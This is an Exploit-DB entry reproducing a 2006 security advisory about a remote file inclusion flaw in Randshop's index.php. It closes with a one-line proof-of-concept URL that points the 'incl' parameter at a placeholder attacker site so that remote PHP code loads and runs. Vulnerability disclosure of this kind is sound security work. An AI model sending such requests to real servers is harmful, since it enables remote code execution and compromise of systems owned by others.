Randshop 0.9.3/1.2 - 'index.php' Remote File Inclusion

EDB-ID:

28162




Platform:

PHP

Date:

2006-07-04


source: https://www.securityfocus.com/bid/18809/info

Randshop is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.

An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.

http://www.example.com/randshop/index.php?incl=http://attacker's site